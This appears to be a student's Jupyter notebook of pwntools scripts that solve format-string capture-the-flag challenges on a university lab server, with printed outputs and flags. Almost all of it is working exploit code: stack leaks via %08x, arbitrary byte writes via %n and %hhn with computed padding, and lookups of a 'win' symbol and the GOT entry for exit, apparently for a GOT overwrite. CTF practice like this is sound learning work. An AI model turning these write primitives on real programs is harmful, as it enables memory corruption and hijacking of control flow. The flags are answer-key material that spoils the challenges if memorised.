In [1]:
%env TERMINFO=/usr/share/terminfo
%env PWNLIB_NOTERM=true

env: TERMINFO=/usr/share/terminfo
env: PWNLIB_NOTERM=true


In [20]:
context

ContextType()

In [ ]:
from pwn import *

SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10092
    
s = remote(SERVER, PORT, timeout=9999, level='error')

# 0x804a040
msg = '\x40\xa0\x04\x08' + '.%08x'*6 + '%n'
s.sendline(msg)
print(s.recvall())

In [57]:
from pwn import *

SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10093
    
s = remote(SERVER, PORT, timeout=9999, level='error')

# 0x804a040 = 58
msg = '\x40\xa0\x04\x08' + '.%08x'*6 + 'A'*10  + '%7$n'
print(msg)
# msg = 'AAAA' + '.%08x' * 20
s.sendline(msg)
print(s.recvall())

@ .%08x.%08x.%08x.%08x.%08x.%08xAAAAAAAAAA%7$n
b'@\xa0\x04\x08.ffffdc5c.0000007f.ffffdcb8.f7ffda74.00000001.f7fce2e8AAAAAAAAAA\nSuccess! You hit the target!\nHere is your flag: SSof{And_where_I_want}\n'


In [196]:
from pwn import *

SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10094

s = remote(SERVER, PORT, timeout=9999, level='error')

# [0x804a044] target => we need to write 1 to the most significant byte => [0x804a047]
msg = '\x47\xa0\x04\x08' + '%0100x' + '%7$hhn'
print(msg)
# msg = 'AAAA' + '.%08x' * 20
s.sendline(msg)
print(s.recvall())

G %0100x%7$hhn
b'G\xa0\x04\x0800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffdc5c\nSuccess! You hit the target!\nHere is your flag: SSof{And_write_very_big_numbers}\n'


In [235]:
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10092
    
s = remote(SERVER, PORT, timeout=9999, level='error')

# 0x804a040
msg = 'AAAA' + '.%08x'*60
s.sendline(msg)
print(s.recvall())

b'AAAA.ffffdc5c.0000007f.ffffdcb8.f7ffda74.00000001.f7fce2e8.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.Oops, not quite!\n'


In [252]:
from pwn import *

SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10095

s = remote(SERVER, PORT, timeout=9999, level='error')

# [0x804a044] target
# 0x0f5f1aa9
addr2val = {
    '\x44\xa0\x04\x08': 0xa9,
    '\x45\xa0\x04\x08': 0x1a,
    '\x46\xa0\x04\x08': 0x5f,
    '\x47\xa0\x04\x08': 0x0f,
}
addresses = list(addr2val.keys())[::-1]
addr2val = list(addr2val.items())[::-1]

msg = ''.join(addresses)
cur_printed = 4 * len(addresses)

msg += '%08x' * 6
cur_printed += 6 * 8

for i, (addr, val) in enumerate(addr2val):
    cur_printed %= 0x100
    print(f'`{addr}`', val, end=' ---> ')
    
    # Print 'padding'
    to_print = (val - cur_printed + 0x100) % 0x100
    msg += f'%{to_print}x%{7+i}$hhn'
    cur_printed += to_print
    print(cur_printed)
    
print(msg)
s.sendline(msg)
print(s.recvall())

`G ` 15 ---> 271
`F ` 95 ---> 95
`E ` 26 ---> 282
`D ` 169 ---> 169
G F E D %08x%08x%08x%08x%08x%08x%207x%7$hhn%80x%8$hhn%187x%9$hhn%143x%10$hhn
b'G\xa0\x04\x08F\xa0\x04\x08E\xa0\x04\x08D\xa0\x04\x08ffffdc5c0000007fffffdcb8f7ffda7400000001f7fce2e8                                                                                                                                                                                                        804a047                                                                         804a046                                                                                                                                                                                    804a045                                                                                                                                        804a044\nSuccess! You hit the target!\nHere is your flag: SSof{And_write_BIIIIIG_numbers_Very_BIG}\n'


In [251]:
from pwn import *

SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10096

s = remote(SERVER, PORT, timeout=9999, level='error')

line = s.recvline()
print(line)
# [0x804a070] target
# value from end to front
addr2val = {
    '\x70\xa0\x04\x08': int(line[-3:-1], 16),
    '\x71\xa0\x04\x08': int(line[-5:-3], 16),
    '\x72\xa0\x04\x08': int(line[-7:-5], 16),
    '\x73\xa0\x04\x08': int(line[-9:-7], 16),
}
print(addr2val)
addresses = list(addr2val.keys())[::-1]
addr2val = list(addr2val.items())[::-1]

msg = ''.join(addresses)
cur_printed = 4 * len(addresses)

msg += '%08x' * 6
cur_printed += 6 * 8

for i, (addr, val) in enumerate(addr2val):
    cur_printed %= 0x100
    print(f'`{addr}`', val, end=' ---> ')
    
    # Print 'padding'
    to_print = (val - cur_printed + 0x100) % 0x100
    msg += f'%{to_print}u%{7+i}$hhn'
    cur_printed += to_print
    print(cur_printed)
    
print(msg)
s.sendline(msg)
print(s.recvall())

b'Your random value is: 0x6813e64d\n'
{'p\xa0\x04\x08': 77, 'q\xa0\x04\x08': 230, 'r\xa0\x04\x08': 19, 's\xa0\x04\x08': 104}
`s ` 104 ---> 104
`r ` 19 ---> 275
`q ` 230 ---> 230
`p ` 77 ---> 333
s r q p %08x%08x%08x%08x%08x%08x%40u%7$hhn%171u%8$hhn%211u%9$hhn%103u%10$hhn
b's\xa0\x04\x08r\xa0\x04\x08q\xa0\x04\x08p\xa0\x04\x08ffffdc5c0000007f00000000f7fe2a90080481f800000001                               134520947                                                                                                                                                                  134520946                                                                                                                                                                                                          134520945                                                                                              134520944\nSuccess! You hit the target!\nHere is your flag: SSof{WoW!Random_numbers_also}\n'


In [261]:
from pwn import *
elf = ELF('/Users/martinmirakyan/Desktop/bin')
win_address = elf.symbols['win']
exit_address = elf.got['exit']
print(hex(win_address), win_address)
print(hex(exit_address), exit_address)

0x804849b 134513819
0x804a018 134520856


In [260]:
elf.symbols['win'], elf.symbols['exit']

(134513819, 134513520)

In [258]:
elf.got

{'__gmon_start__': 134520828,
 'read': 134520844,
 'printf': 134520848,
 'system': 134520852,
 'exit': 134520856,
 '__libc_start_main': 134520860}